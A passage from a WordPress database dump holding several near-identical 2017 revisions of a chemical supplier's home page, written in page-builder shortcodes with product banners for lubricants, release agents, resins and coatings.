link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur four fully stocked USA & Canadian locations allow us to ensure swift delivery. Huge KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:49:11', '2017-05-27 09:49:11', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4304, 1, '2017-05-27 09:50:17', '2017-05-27 09:50:17', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:50:17', '2017-05-27 09:50:17', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4305, 1, '2017-05-27 09:52:06', '2017-05-27 09:52:06', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" width="100%" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:52:06', '2017-05-27 09:52:06', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4306, 1, '2017-05-27 09:54:46', '2017-05-27 09:54:46', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:54:46', '2017-05-27 09:54:46', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4307, 1, '2017-05-27 09:56:52', '2017-05-27 09:56:52', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" 